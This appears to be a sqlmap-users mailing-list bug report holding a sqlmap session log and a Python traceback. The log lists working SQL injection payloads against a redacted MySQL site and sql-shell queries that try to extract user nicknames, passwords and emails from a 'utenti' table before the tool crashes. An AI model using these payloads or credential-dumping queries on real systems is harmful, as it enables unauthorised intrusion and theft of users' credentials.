[22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[22:15:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12' AND 7690=7690 AND 'coUR'='coUR
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=12' UNION ALL SELECT NULL, CONCAT(0x3a6e617a3a,0x61476a577a7053536676,0x3a6f61623a)# AND 'vhgF'='vhgF
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
---
[22:15:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select nick, pws from utenti
[22:15:56] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
select nick, pws from utenti: 'None'
sql-shell> select nick, pws from utenti
[22:16:08] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
select nick, pws from utenti: 'None'
sql-shell> select nick, pws, mail from utenti
[22:16:32] [INFO] fetching SQL SELECT statement query output: 'select nick, pws, mail from utenti'
[22:16:32] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[22:16:32] [INFO] resumed: 4
the SQL query provided can return 4 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[22:16:36] [INFO] retrieving the length of query output
[22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u **************************************************** --sql-shell --threads=5
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
    start()
  File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, in start
    action()
  File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in action
    conf.dbmsHandler.sqlShell()
  File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2451, in sqlShell
    output = self.sqlQuery(query)
  File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2397, in sqlQuery
    output = inject.getValue(query, fromUser=True)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in getValue
    value = __goInferenceProxy(query, fromUser, expected, batch, unpack, charsetType, firstChar, lastChar, dump)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in __goInferenceProxy
    output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in __goInferenceFields
    output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in __goInference
    _, length, _ = queryOutputLength(expression, payload)
  File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in queryOutputLength
    count, length = bisection(payload, lengthExprUnescaped, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
TypeError: bisection() got an unexpected keyword argument 'expected'
[*] shutting down at 22:16:36
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users